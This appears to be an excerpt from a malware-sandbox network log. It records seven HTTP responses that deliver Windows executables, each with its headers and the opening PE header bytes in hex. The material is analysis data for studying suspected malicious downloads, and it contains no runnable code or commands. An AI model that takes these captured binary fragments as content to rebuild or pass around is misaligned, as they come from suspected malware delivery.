Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 23:31:17 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 23:31:29 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 23:31:31 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 23:31:36 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 23:31:39 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 23:31:42 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 23:32:01 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
